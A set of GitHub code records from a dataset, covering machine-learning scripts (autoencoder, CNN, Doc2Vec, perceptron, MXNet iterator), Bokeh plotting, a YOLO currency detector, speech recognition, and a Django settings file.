self.batch_size=batch_size\n        self.init=init\n        self.use_earlyStop=use_earlyStop\n        self.stacks=[self.make_stack(i) for i in range(self.n_stacks)]\n        self.make_autoencoders()\n        plot_model(self.autoencoders,show_shapes=True,to_file=\"autoencoders.png\")\n\n    def make_autoencoders(self):\n        \"\"\" Fully connected autoencoder model\n        \"\"\"\n        x=Input(shape=(self.dims[0],),name='input')\n        h=x\n        #encoder layer\n        for i in range(self.n_stacks-1):\n            h=Dense(self.dims[i+1],kernel_initializer=self.init,activation=None,name='encoder_%d'%i)(h)\n            if self.batchnorm:\n                h=BatchNormalization(center=True, scale=False)(h)\n            if self.act in advanced_activations:\n                h=keras.layers.__dict__[self.act](name='act_encoder_%d'%i)(h)\n            else:\n                h=Activation(self.act,name=\"act_encoder_%d\"%i)(h)\n        #hidden layer, recommend to use a linear or tanh activation \n        h=Dense(self.dims[-1],kernel_initializer=self.init,activation=None,name=\"encoder_%d\"%(self.n_stacks-1))(h)\n        if self.batchnorm:\n            h=BatchNormalization(center=True, scale=False)(h)\n        h=Activation(self.actinlayercenter,name=\"act_center\")(h)\n        #decoder layer\n        for i in range(self.n_stacks-1,0,-1):\n            h=Dense(self.dims[i],kernel_initializer=self.init,activation=None,name='decoder_%d'%i)(h)\n            if self.batchnorm:\n                h=BatchNormalization(center=True, scale=False)(h)\n            if self.act in advanced_activations:\n                h=keras.layers.__dict__[self.act](name='act_decoder_%d'%i)(h)\n            else:\n                h=Activation(self.act,name=\"act_decoder_%d\"%i)(h)\n        #output\n        h=Dense(self.dims[0],kernel_initializer=self.init,name=\"decoder_0\",activation=self.actinlayercenter)(h)\n        #autoencoders\n        self.autoencoders=Model(inputs=x,outputs=h,name=\"AE\")\n        #get encoder\n        self.encoder=self.get_encoder()\n    \n    def get_encoder(self):\n        name=\"encoder_\"+str(self.n_stacks-1)\n        ret= Model(inputs=self.autoencoders.input,\n                   outputs=self.autoencoders.get_layer(name).output,name=\"encoder\")\n        return ret\n\n    def make_stack(self,ith):\n        \"\"\"\n        Make the ith autoencoder for layer-wise pretraining. It has a single hidden layer. 
The input data is corrupted by Dropout(drop_rate) if self.drop_rate>0\n        Arguments:\n            ith: int type, in range(0,self.n_stacks)\n        \"\"\"\n        in_out_dim=self.dims[ith]\n        hidden_dim=self.dims[ith+1]\n        in_act=self.actinlayercenter if ith==self.n_stacks-1 else self.act\n        x=Input(shape=(in_out_dim,),name=\"input\")\n        h=x\n        #encoder stack layer \n        if self.drop_rate>0.0:\n            h = Dropout(self.drop_rate, name='encoder_dropout')(h)\n        #h=Dense(units=hidden_dim,activation=None,kernel_initializer=self.init,kernel_regularizer=l1_l2(0.1,0.2,name='encoder_%d'%ith)\n        h=Dense(units=hidden_dim,activation=None,kernel_initializer=self.init,name='encoder_%d'%ith)(h)\n        if in_act in advanced_activations:\n            h=keras.layers.__dict__[self.act](name='act_encoder_%d'%ith)(h)\n        else:\n            h=Activation(self.act,name='act_encoder_%d'%ith)(h)\n        h=Dense(units=in_out_dim,activation=None,kernel_initializer=self.init,name='decoder_%d'%ith)(h)\n        #decoder stack layer \n        if self.drop_rate>0.0:\n            h = Dropout(self.drop_rate, name='decoder_dropout')(h)\n        if in_act in advanced_activations:\n            h=keras.layers.__dict__[self.act](name='act_decoder_%d'%ith)(h)\n        else:\n            h=Activation(self.act,name=\"act_decoder_%d\"%ith)(h)\n        model=Model(inputs=x,outputs=h)\n        return model\n\n    def pretrain_stacks(self,x,epochs=200,decaying_step=4):\n        \"\"\" \n        Layer-wise pretraining. Each stack is trained for 'epochs' epochs using SGD with learning rate decaying 4\n        times every 'epochs/4' epochs.\n        \n        Arguments:\n            x: input data, shape=(n_samples, n_dims)\n            decaying_step, default=4, \n            epochs: epochs for each stack\n        \"\"\"\n        features=x\n        print(type(features),features.shape)\n        decaying_step=int(decaying_step)\n        for i in range(self.n_stacks):\n            print('Pretraining the %dth layer...'%i)\n            for j in range(decaying_step):# learning rate multiplied by 0.1 every 'epochs/decaying_step' epochs\n                print('learning rate=',pow(10,-1-j))\n                self.stacks[i].compile(optimizer=SGD(pow(10,-1-j),momentum=0.9),loss='mse')\n                if self.use_earlyStop is True:\n                    callbacks=[EarlyStopping(monitor='loss',min_delta=1e-4,patience=10,verbose=1,mode='auto')]\n                    self.stacks[i].fit(features,features,callbacks=callbacks,batch_size=self.batch_size,epochs=math.ceil(epochs/decaying_step)) \n                else:\n                    self.stacks[i].fit(x=features,y=features,batch_size=self.batch_size,epochs=math.ceil(epochs/decaying_step))\n            print('The %dth has been pretrained successfully!!!!!'%(i+1))\n            #update features to the inputs of the next stacked layer\n            feature_model=Model(inputs=self.stacks[i].input, outputs=self.stacks[i].get_layer('encoder_%d'%i).output)\n            features=feature_model.predict(features)\n        print(\"All stacked autoencoder layers trained successfully!!!!\")\n    \n    def pretrain_autoencoders(self,x,epochs=300):\n        \"\"\"\n        Fine tune autoencoders end-to-end after layer-wise pretraining using 'pretrain_stacks()'\n        Use SGD with learning rate = 0.1, decayed 10 times every 50 epochs\n        \n        Arguments: \n            :param x: input data, shape=(n_samples, n_dims)\n            :param epochs: training epochs\n        \"\"\"\n        print(\"Copy layer-wise pretrained weights to autoencoders\")\n        for i in range(self.n_stacks):\n            name='encoder_%d'%i\n            self.autoencoders.get_layer(name).set_weights(self.stacks[i].get_layer(name).get_weights())\n            name=\"decoder_%d\"%i\n            self.autoencoders.get_layer(name).set_weights(self.stacks[i].get_layer(name).get_weights())\n        print(\"Fine tuning autoencoder end to end!!\")\n        for j in range(math.ceil(epochs/50)):\n            lr=pow(10,-j-1)\n            
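# editor's note (added comment): the schedule below steps the learning rate through\n            # 0.1, 0.01, 0.001, ... dropping one decade for every 50-epoch chunk of fine-tuning\n            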
print(\"Fine tuning autoencoders with learning rate=\"+str(lr))\n self.autoencoders.compile(optimizer=SGD(lr, momentum=0.9), loss='mse')\n #early stopping\n if self.use_earlyStop is True:\n callbacks=[EarlyStopping(monitor='loss',min_delta=1e-4,patience=10,verbose=1,mode='auto')]\n self.autoencoders.fit(x=x, y=x, batch_size=self.batch_size,callbacks=callbacks, epochs=50)\n else:\n self.autoencoders.fit(x=x, y=x, batch_size=self.batch_size, epochs=50)\n\n def fit(self,x,epochs=200):\n self.pretrain_stacks(x,epochs=epochs)\n self.pretrain_autoencoders(x,epochs=epochs)\n \n\nif __name__=='__main__':\n \"\"\"\n An example for how to use SAE model on MNIST dataset. In terminal run\n python SAE.py\n \"\"\"\n import numpy as np\n def load_mnist():\n # the data, shuffled and split between train and test sets\n from keras.datasets import mnist\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n x = np.concatenate((x_train, x_test))\n y = np.concatenate((y_train, y_test))\n x = x.reshape((x.shape[0], -1))\n x = np.divide(x, 50.) # normalize as it does in DEC paper\n print ('MNIST samples', x.shape)\n return x, y\n x,y=load_mnist()\n print(\"Test on x shape is \",x.shape)\n sae=SAE(dims=[x.shape[-1],64,32])\n sae.fit(x=x,epochs=150)\n #extract features\n features=sae.encoder.predict(x)\n \n\n\n\n \n\n \n\n \n \t\t\t\n\n\n\n\n","repo_name":"eleozzr/desc","sub_path":"desc/original/SAE-non.py","file_name":"SAE-non.py","file_ext":"py","file_size_in_byte":10188,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"27"} +{"seq_id":"71999981833","text":"import pandas as pd\nimport numpy as np\nfrom bokeh.plotting import figure\nfrom bokeh.io import output_file\nfrom bokeh.resources import CDN\nfrom bokeh.embed import file_html\nfrom bokeh.models import DataRange1d, Legend, ColumnDataSource\nfrom bokeh.models import PanTool, ResetTool, WheelZoomTool, HoverTool, LassoSelectTool, BoxSelectTool\n\n\ndf = pd.read_csv(\"WFPAfricaFinal.csv\")\ndf_2 = pd.read_csv(\"Ref_vs_Pop.csv\")\n\ncountries = df_2[\"Country\"].unique()\nmy_palette = ['goldenrod', 'forestgreen', 'black', 'blue', 'blueviolet', 'brown','crimson', \\\n'darkblue', 'darkcyan', 'darkgreen', 'limegreen', 'darkkhaki', 'darkred', 'darkseagreen', 'darkviolet', 'deeppink', \\\n'green', 'indigo', 'magenta', 'maroon', 'navy', 'orange', 'orchid', 'purple', \\\n'red', 'sienna', 'teal', 'turquoise', 'violet', 'yellow']\n\n\n# creates per country a multiline plot\n# which displays the price of products over time\nfOut = open(\"CountryChart.html\", \"a\")\nfor country in countries:\n legend_it = []\n products = df[\"food\"][df[\"country\"] == country].unique()\n f = figure(plot_width=1000, plot_height=650, title=country)\n for product, color in zip(products, my_palette):\n source = ColumnDataSource(name = 'data', data=dict(\n year = df[\"year\"][(df[\"country\"] == country) & (df[\"food\"] == product)],\n price_per_unit = df[\"price_per_unit\"][(df[\"country\"] == country) & (df[\"food\"] == product)]\n ))\n hover = HoverTool(tooltips=[\n (\"year\", \"@year\"),\n (\"price_per_unit\", \"@price_per_unit\")\n ], mode='vline')\n c = f.line(x='year', y='price_per_unit', line_width=2, color=color, legend=source.name, alpha=0.8, muted_color=color, muted_alpha=0.1, source=source)\n legend_it.append((product, [c]))\n f.toolbar.tools = [PanTool(), ResetTool(), WheelZoomTool(), hover, LassoSelectTool(), BoxSelectTool()]\n f.xaxis.axis_label=\"year\"\n f.yaxis.axis_label=\"price per unit\"\n legend = Legend(items=legend_it, 
location=(0, 10))\n legend.click_policy=\"hide\"\n f.legend.visible = False\n f.add_layout(legend, \"right\")\n html = file_html(f, CDN, \"CountryChart\")\n fOut.write(html)\nfOut.close()\n\n\n# # creates scatterplots between the rate of change of the number of refugees\n# # in percentage of the population of the country\n# # and the rate of change of the average price per country\n# fOut = open(\"Price_vs_refugee.html\", \"a\")\n# f = figure(plot_width=950, plot_height=450, title=\"price vs refugees\")\n# legend_it = []\n# for country, color in zip(countries, my_palette):\n# source = ColumnDataSource(name = \"data\", data=dict(\n# RefugeePercentagePopulation = df_2[\"Percent_ref_vs_pop\"][df_2[\"Country\"] == country],\n# RateOfChangePrice = df_2[\"Rate_of_change_price\"][df_2[\"Country\"] == country]\n# ))\n# f.xaxis.axis_label=\"refugees vs population\"\n# f.yaxis.axis_label=\"rate of change price\"\n# hover = HoverTool(tooltips=[\n# (\"refugees vs population\", \"@RefugeePercentagePopulation\"),\n# (\"rate of change price\", \"@RateOfChangePrice\")\n# ])\n# f.toolbar.tools = [PanTool(), ResetTool(), WheelZoomTool(), hover, LassoSelectTool(), BoxSelectTool()]\n# c = f.circle(x='RefugeePercentagePopulation', y='RateOfChangePrice', size=12, color=color, legend=source.name, source=source)\n# legend_it.append((country, [c]))\n# legend = Legend(items=legend_it, location=(0, 10))\n# legend.click_policy=\"hide\"\n# f.legend.visible=False\n# f.add_layout(legend, \"right\")\n# html = file_html(f, CDN, \"Price_vs_refugee\")\n# fOut.write(html)\n# fOut.close()\n","repo_name":"chrisalgerges98/DataProcessing","sub_path":"CSV database and Scripts/WFP_EDA.py","file_name":"WFP_EDA.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6530252789","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom ttkthemes import ThemedStyle\nimport cv2\nimport cvzone\nimport math\nfrom ultralytics import YOLO\n\napp = tk.Tk()\napp.title(\"Image Object Detection\")\nstyle = ThemedStyle(app)\nstyle.set_theme(\"arc\")\n\ncurrency_values = {\n \"Rs10\": 10,\n \"Rs20\": 20,\n \"Rs50\": 50,\n \"Rs100\": 100,\n \"Rs200\": 200,\n \"Rs500\": 500,\n \"Rs2000\": 2000\n}\n\nclassNames = [\"Rs10\", \"Rs20\", \"Rs50\", \"Rs100\", \"Rs200\", \"Rs500\", \"Rs2000\"]\n\n\n\ndef open_image():\n file_path = filedialog.askopenfilename(filetypes=[(\"Image Files\", \"*.jpg *.jpeg *.png\")])\n if file_path:\n start_detection(file_path)\n\ndef start_detection(image_path):\n img = cv2.imread(image_path)\n model = YOLO(\"../Yolo-Weights/best200on350.pt\") # Replace with the actual path\n\n total_sum = 0 # Initialize the total sum\n\n result = model(img)\n\n for r in result:\n boxes = r.boxes\n\n for box in boxes:\n conf = math.ceil((box.conf[0] * 100)) / 100\n if conf < 0.5:\n continue # Skip low-confidence detections\n x1, y1, x2, y2 = box.xyxy[0]\n x1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)\n cv2.rectangle(img, (x1, y1), (x2, y2), (255, 0, 255), 3)\n\n cls = int(box.cls[0])\n class_name = classNames[cls]\n\n if class_name in currency_values:\n currency_value = currency_values[class_name]\n total_sum += currency_value # Add currency value to total sum\n\n cvzone.putTextRect(img, f\"{class_name}\", (max(0, x1), max(20, y1)), scale=1, thickness=1)\n\n # Display total sum on the image\n cvzone.putTextRect(img, f\"Total: Rs{total_sum}\", (10, 50), scale=2, thickness=2)\n\n cv2.imshow(\"Image\", img)\n cv2.waitKey(0)\n 
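# editor's note (added comment): waitKey(0) blocks until a key is pressed, keeping the\n    # annotated image on screen before the window is torn down below\n    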
cv2.destroyAllWindows()\n\nlabel = tk.Label(app, text=\"Choose an image file for object detection\", font=(\"Helvetica\", 14))\nlabel.pack(pady=10)\n\nimage_button = tk.Button(app, text=\"Open Image File\", command=open_image, font=(\"Helvetica\", 12))\nimage_button.pack(pady=5)\n\napp.mainloop()\n","repo_name":"potato-lulw/IDvalidation","sub_path":"Yolo-With-Webcam/onlyPhotos.py","file_name":"onlyPhotos.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16144939459","text":"import threading\nimport time\nfrom pathlib import Path\nfrom threading import Thread\nimport speech_recognition as sr\nfrom read_time_stamp import seek_phrase\nimport pythonosc.udp_client\nimport logging\n\nlogging.getLogger().setLevel(logging.DEBUG)\n\nprint(sr.Microphone.list_microphone_names())\n\nclass SpeechBufLoader(Thread):\n\n def __init__(self, osc_send_ip=\"127.0.0.1\", osc_send_port=57120, phrase_time_limit=3,\n buf_length=48000*10, num_bufs=10, device_name=None):\n self.r = sr.Recognizer()\n self.m = sr.Microphone(\n sr.Microphone.list_microphone_names().index(device_name)\n if device_name is not None else None\n )\n self.osc_client = pythonosc.udp_client.SimpleUDPClient(osc_send_ip, osc_send_port)\n self.phrase_time_limit = phrase_time_limit\n self.buf_length = buf_length\n self.num_bufs = num_bufs\n self._current_buf = 0\n self._buf_lock = threading.Lock()\n super().__init__()\n\n def run(self) -> None:\n # while True:\n # value = input(\"Type something:\")\n # found_audio = seek_phrase(value)\n #\n # if found_audio is not None:\n # word, file_path, audio_pos = found_audio\n # logging.debug(f\"Recognized {word} at audio position {audio_pos} in {Path(file_path).name}\")\n # self.osc_client.send_message(r'/loadbuf',\n # [self._next_buf, file_path, int(audio_pos), self.buf_length])\n # threading.Thread(target=self._delayed_increment_buf).start()\n # else:\n # logging.debug(\"No words recognized in data set\")\n with self.m as source:\n self.r.adjust_for_ambient_noise(source)\n while True:\n with self.m as source:\n audio = self.r.listen(source, phrase_time_limit=3)\n try:\n # recognize speech using Google Speech Recognition\n value = self.r.recognize_google(audio, language=\"de\")\n logging.debug(f\"Recognized '{value}'\")\n\n found_audio = seek_phrase(value)\n\n if found_audio is not None:\n word, file_path, audio_pos = found_audio\n logging.debug(f\"Found {word} at audio position {audio_pos} in {Path(file_path).name}\")\n self.osc_client.send_message(r'/loadbuf',\n [self._current_buf, file_path, int(audio_pos), self.buf_length])\n threading.Thread(target=self._delayed_increment_buf).start()\n else:\n logging.debug(\"No words recognized in data set\")\n except sr.UnknownValueError:\n logging.debug(\"Oops! Didn't catch that\")\n except sr.RequestError as e:\n logging.debug(\"Uh oh! 
Couldn't request results from Google Speech Recognition service; {0}\".format(e))\n\n    def _delayed_increment_buf(self):\n        time.sleep(2)\n        with self._buf_lock:\n            self._current_buf = (self._current_buf + 1) % self.num_bufs\n\n    def latest_buf(self):\n        return self.get_buf(-1)\n\n    def get_buf(self, offset=0):\n        with self._buf_lock:\n            return (self._current_buf + offset) % self.num_bufs\n\n\nif __name__ == '__main__':\n    sbl = SpeechBufLoader()\n    sbl.start()\n    while True:\n        # print(sbl.latest_buf())\n        time.sleep(0.1)\n","repo_name":"MarcTheSpark/bkp","sub_path":"Python/explorations/live_speech.py","file_name":"live_speech.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"3765927907","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 27 13:16:54 2021\r\n\r\n@author: thors\r\n\"\"\"\r\n\r\nX = int(input())\r\nfor i in range(X):\r\n    k = i+1\r\n    n = int(input())\r\n    x = [int(x) for x in input().split()]\r\n    y = [int(x) for x in input().split()]\r\n    \r\n    #To find the smallest scalar product, pair ascending x with descending y\r\n    x.sort()\r\n    y.sort(reverse = True)\r\n    \r\n    scalarProd = 0\r\n    for i in range(len(x)):\r\n        scalarProd += x[i]*y[i]\r\n    \r\n    print(f'Case #{k}: {scalarProd}')\r\n","repo_name":"ths251/Kattis-Solution","sub_path":"MinimumScalarProduct.py","file_name":"MinimumScalarProduct.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72411393032","text":"import tensorflow as tf\r\nfrom tensorflow.keras import Model, layers, Sequential\r\nfrom tensorflow.keras.layers import Input\r\nfrom tensorflow.keras.constraints import max_norm\r\n\r\nfilters = 10\r\nkernel_size = 5\r\nbatchsz = 128\r\n\r\n\r\nclass MyCNN(Model):\r\n    def __init__(self):\r\n        super(MyCNN, self).__init__()\r\n        self.conv = layers.Conv2D(filters, kernel_size, padding='valid')\r\n        self.relu = layers.ReLU()\r\n        self.drop = layers.Dropout(rate=0.5)\r\n        self.flatten = layers.Flatten()\r\n        self.d1 = layers.Dense(16, activation='relu')\r\n        self.d2 = layers.Dense(1, activation='sigmoid')\r\n\r\n    def call(self, x):\r\n        x = self.conv(x)\r\n        x = self.relu(x)\r\n        x = self.drop(x)\r\n        x = self.flatten(x)\r\n        x = self.d1(x)\r\n        y = self.d2(x)\r\n        return y\r\n\r\n\r\nclass_model = MyCNN()\r\nclass_model.build(input_shape=(batchsz, 28, 28, 1))\r\nclass_model.summary()\r\n\r\n\r\nseq_model = Sequential([\r\n    layers.Conv2D(filters, kernel_size, padding='valid', input_shape=(28, 28, 1)),\r\n    layers.ReLU(),\r\n    layers.Dropout(rate=0.5),\r\n    layers.Flatten(),\r\n    layers.Dense(16, activation='relu')\r\n])\r\nseq_model.add(layers.Dense(1, activation='sigmoid'))\r\nseq_model.summary()  # three ways to give a model its input shape: build(), fit(), or input_shape=()\r\n","repo_name":"yxq9710/dataProcessAndModelReproduction","sub_path":"codes/bilstm_crf_CNN/MyCNN.py","file_name":"MyCNN.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"20789767839","text":"import os\n\nPRODUCTION = os.environ.get(\"PRODUCTION\", \"\")\nDOCKER = os.environ.get(\"DOCKER\", \"\")\n\ngettext = lambda s: s\nPROJECT_PATH = os.path.realpath(os.path.dirname(__file__))\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nSITE_ID = 1\nSITE = \"core\"\n\n\nALLOWED_HOSTS = [\n    \"howtokillyourself.org\",\n    \"dev.howtokillyourself.org\",\n    
\"localhost\",\n \"0.0.0.0\",\n]\n\n# Application definition\n\nINSTALLED_APPS = [\n #'djangocms_admin_style',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.postgres',\n 'django.contrib.sitemaps',\n 'django.contrib.sites',\n\n # libraries\n 'taggit',\n 'modelcluster',\n\n # apps\n 'suicide_site',\n 'articles',\n\n # wagtail cms\n 'wagtail.wagtailforms',\n 'wagtail.wagtailredirects',\n 'wagtail.wagtailembeds',\n 'wagtail.wagtailsites',\n 'wagtail.wagtailusers',\n 'wagtail.wagtailsnippets',\n 'wagtail.wagtaildocs',\n 'wagtail.wagtailimages',\n 'wagtail.wagtailsearch',\n 'wagtail.wagtailadmin',\n 'wagtail.wagtailcore',\n]\n\nWAGTAIL_SITE_NAME = 'How to Kill Yourself'\n\nGEOIP_PATH = os.path.realpath(os.path.join(BASE_DIR, \"geoip/GeoLiteCity.dat\"))\n\nMIDDLEWARE_CLASSES = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'wagtail.wagtailcore.middleware.SiteMiddleware',\n 'wagtail.wagtailredirects.middleware.RedirectMiddleware',\n]\n\nROOT_URLCONF = 'core_site.urls'\n\nTEMPLATE_DIRS = (\n PROJECT_PATH + '/templates/',\n)\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': ['templates'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'core_site.context_processor.geoip',\n ],\n },\n },\n]\n\nCMS_TEMPLATES = (\n ('djangocms/cms.html', 'CMS Template'),\n ('djangocms/cms2.html', 'CMS Template v2'),\n)\n\nLANGUAGES = [\n ('en-us', 'English'),\n]\n\nWSGI_APPLICATION = 'core_site.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.9/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'suicide_db',\n 'USER': 'gregmccoy',\n 'PASSWORD': 'Conestoga1',\n 'HOST': 'localhost',\n 'PORT': 5432,\n }\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.9/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nMEDIA_ROOT = os.path.join(PROJECT_PATH, 'images')\nMEDIA_URL = \"/media/\"\n\nSTATIC_ROOT = \"/var/www/static/\"\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"templates/static\"),\n]\nSTATICFILES_STORAGE = \"django.contrib.staticfiles.storage.ManifestStaticFilesStorage\"\n\nif 
PRODUCTION:\n DEBUG = False\n from production_settings import *\nelse:\n DEBUG = True\n SECRET_KEY = '3$0+y($j4@22)e$3c=3j^!#pr&#mdc#%xvrp13b9$g4!kb*af8'\n\nif DOCKER:\n DATABASES[\"default\"][\"HOST\"] = \"db\"\n\n","repo_name":"FaithTechLabs/suicide-prevention","sub_path":"core_site/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"74343404232","text":"__author__ = 'ericrincon'\n\nfrom gensim.models import Doc2Vec\nfrom NeuralNet import NeuralNet\nfrom os import listdir\nfrom os.path import isfile, join\nfrom DataLoader import DataLoader\nfrom gensim import utils\nimport sys\nimport numpy\n\n\"\"\"\n Create an empty string of parameter length.\n Used in conjunction with python's translation method to, in this case, pre-process text\n for Doc2Vec.\n\"\"\"\ndef create_whitespace(length):\n whitespace = ''\n\n for i in range(length):\n whitespace += ' '\n\n return whitespace\n\n\ndef preprocess(line):\n punctuation = \"`~!@#$%^&*()_-=+[]{}\\|;:'\\\"|<>,./?åαβ\"\n numbers = \"1234567890\"\n number_replacement = create_whitespace(len(numbers))\n spacing = create_whitespace(len(punctuation))\n\n lowercase_line = line.lower()\n translation_table = str.maketrans(punctuation, spacing)\n translated_line = lowercase_line.translate(translation_table)\n translation_table_numbers = str.maketrans(numbers, number_replacement)\n final_line = translated_line.translate(translation_table_numbers)\n line_tokens = utils.to_unicode(final_line).split()\n\n return set(line_tokens)\n\ndef main():\n model = Doc2Vec.load('400_pvdm_doc2vec.d2v')\n model_dbow = Doc2Vec.load('400_pvdbow_doc2vec.d2v')\n #mistake pvdm is actually pv-dbow\n path = 'datasets/'\n\n files = [f for f in listdir(path) if isfile(join(path,f))]\n files.pop(0)\n\n data_loader = DataLoader(path)\n\n domains = data_loader.csv_files\n\n\n names = {1: 'title', 4: 'abstract', 5: 'mesh', 'y': 6}\n\n domain_features = data_loader.get_feature_matrix(names)\n\n #get size\n n_total_documents = 0\n\n for domain in domain_features:\n n_total_documents+=len(domain[0])\n\n all_features = numpy.zeros(shape=(n_total_documents, 800))\n all_labels = numpy.asarray([])\n i = 0\n\n for domain in domain_features:\n features, labels = domain\n all_labels = numpy.hstack((all_labels, labels))\n for feature_vector in features:\n preprocessed_line = list(preprocess(feature_vector))\n all_features[i, 0:400] = numpy.float_(model.infer_vector(preprocessed_line))\n all_features[i, 400:] = numpy.float_(model_dbow.infer_vector(preprocessed_line))\n i+=1\n all_labels = numpy.asarray(all_labels)\n all_labels[all_labels == -1] = 0\n all_labels = numpy.intc(all_labels)\n train, test = data_loader.create_random_samples(all_features, all_labels)\n train_x, train_y = train\n test_x, test_y = test\n\n classifier = NeuralNet(n_hidden_units=[200], output_size=2, batch_size=20, n_epochs=200, dropout=True,\n activation_function='relu', learning_rate=.3, momentum=True, momentum_term=.5)\n\n classifier.train(train_x, train_y)\n classifier.test(test_x, test_y)\n\nif __name__ == '__main__':\n main()","repo_name":"ericrincon/Deep-Learning-NLP","sub_path":"Doc2VecClassifier.py","file_name":"Doc2VecClassifier.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"33509809438","text":"import numpy as np\n\ninputs = [[-1, 0.1, 0.4, 0.7], [-1, 0.3, 0.7, 0.2], 
[-1, 0.6, 0.9, 0.8], [-1, 0.5, 0.7, 0.1]]\nlabels = [1, -1, -1, 1]\nweights = [0, 0, 0, 0]\n\nlearningRate = 1\noutput = []\nepochs = 0\nmaxEpochs = 1000\n\ndef sinal(elem):\n    if elem > 0:\n        return 1\n\n    return -1\n\n\n# train until every sample is classified correctly or the epoch budget runs out\nwhile len(output) < len(inputs) and epochs < maxEpochs:\n    output = []\n    epochs = epochs + 1\n\n    for input, label in zip(inputs, labels):\n        u = np.dot(input, weights)\n        y = sinal(u)\n\n        err = label - y\n\n        if err != 0:\n            for widx in range(len(weights)):\n                # w <- w + N * (d[i] - y) * x[i]\n                weights[widx] = weights[widx] + learningRate * err * input[widx]\n        else:\n            output.append(y)\n\n\nprint(\"FINAL WEIGHTS\", weights)\n\n\n\n","repo_name":"ronebrandao/neural-networks","sub_path":"Python/SimplePerceptron/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73750052231","text":"import mxnet as mx\nimport numpy as np\nimport sys\n\nclass TruncatedSentenceIter(mx.io.DataIter):\n\n\tdef __init__(self, train_sets, batch_size, init_states, truncate_len, delay,\n\t\t\t\t feat_dim, label_dim, data_name, label_name,\n\t\t\t\t do_shuffling, pad_zeros):\n\n\t\tself.train_sets = train_sets\n\t\tself.data_name = data_name\n\t\tself.label_name = label_name\n\t\tself.has_label = True # _load_data below checks this flag, but it was never set anywhere\n\n\t\tself.feat_dim = feat_dim\n\t\tself.label_dim = label_dim\n\n\t\tself.batch_size = batch_size\n\t\tself.truncate_len = truncate_len\n\t\tself.delay = delay\n\n\n\t\tself.do_shuffling = do_shuffling\n\t\tself.pad_zeros = pad_zeros\n\n\t\tself.data = [mx.nd.zeros((batch_size, truncate_len, feat_dim))]\n\t\tself.label = [mx.nd.zeros((batch_size, truncate_len, label_dim))]\n\n\t\tself.init_state_names = [x[0] for x in init_states]\n\t\tself.init_state_arrays = [mx.nd.zeros(x[1]) for x in init_states]\n\n\t\tself.provide_data = [(data_name, self.data[0].shape)] + init_states\n\t\tself.provide_label = [(label_name, self.label[0].shape)]\n\n\t\tself._load_data()\n\t\tself._make_data_plan()\n\n\tdef _load_data(self):\n\t\tsys.stderr.write('Loading data into memory...\\n')\n\t\tself.features = []\n\t\tself.labels = []\n\t\tself.utt_ids = []\n\n\t\tseq_len_tot = 0.0\n\t\tfor i in range (len(self.train_sets)):\n\t\t\tself.train_sets[i].initialize_read()\n\t\t\twhile True:\n\t\t\t\t(feats, tgs, utt_id) = self.train_sets[i].load_next_seq()\n\t\t\t\tif utt_id is None:\n\t\t\t\t\tbreak\n\t\t\t\tif tgs is None and self.has_label:\n\t\t\t\t\tcontinue\n\t\t\t\tif feats.shape[0] == 